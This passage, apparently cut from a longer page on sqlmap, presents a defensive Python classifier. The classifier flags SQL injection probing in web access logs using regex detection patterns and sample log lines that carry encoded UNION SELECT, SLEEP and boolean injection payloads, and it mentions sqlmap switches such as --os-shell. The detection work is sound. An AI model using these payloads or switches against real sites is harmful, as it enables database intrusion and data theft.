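Seen from the defender's side of the commands above, as an added example that is not part of this page: a small classifier for web server access logs that flags the traces an sqlmap run leaves, namely the default `sqlmap/...` User-Agent and the UNION, time-delay, comment-terminated and quoted-boolean probes behind switches such as `--union-cols`, `--dump` and `--os-shell`. The log lines are constructed samples in Apache combined format; the marker patterns are assumptions chosen for illustration, not a complete signature set.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache / nginx "combined" access log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request-level markers of automated SQL injection probing, checked on the decoded URL.
SQLI_MARKERS = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("time-delay", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("comment-tail", re.compile(r"(?:--|/\*)\s*$")),
    ("quoted-boolean", re.compile(r"['\"]\s*(?:and|or)\s+[\w'\"]+\s*=", re.I)),
]


def decode_url(url):
    """Decode percent-encoding twice: normal form encoding plus the double
    encoding some scanners apply to slip past naive filters."""
    return unquote_plus(unquote_plus(url))


def classify_request(line):
    """Parse one access-log line and return its source IP, status and triggered markers."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    if m.group("ua").lower().startswith("sqlmap"):
        findings.append("sqlmap-user-agent")
    decoded = decode_url(m.group("url"))
    findings.extend(name for name, pattern in SQLI_MARKERS if pattern.search(decoded))
    return {"ip": m.group("ip"), "status": int(m.group("status")), "findings": findings}


def suspicious_clients(lines, threshold=2):
    """Count flagged requests per source IP and return the IPs at or above the threshold."""
    counts = Counter()
    for line in lines:
        info = classify_request(line)
        if info and info["findings"]:
            counts[info["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log; the probes mirror the kind of requests the switches above generate.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Nov/2015:10:00:01 +0000] "GET /news?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Nov/2015:10:00:02 +0000] "GET /news?id=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.9 - - [07/Nov/2015:10:00:03 +0000] "GET /news?id=1%27%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 210 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.9 - - [07/Nov/2015:10:00:04 +0000] "GET /news?id=1%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '198.51.100.4 - - [07/Nov/2015:10:00:05 +0000] "GET /news?id=1%27%20AND%20%271%27%3D%271 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        info = classify_request(line)
        print(info["ip"], info["status"], ", ".join(info["findings"]) or "clean")
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

The User-Agent check is the cheapest signal but also the weakest, since a scanner's agent string is trivially changed; the per-IP count over the request-shape markers is what should drive alerting, and a burst of 500 responses on the same parameter (the third sample line) is the cue to look at that endpoint's query construction.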
223 |
--------------------------------------------------------------------------------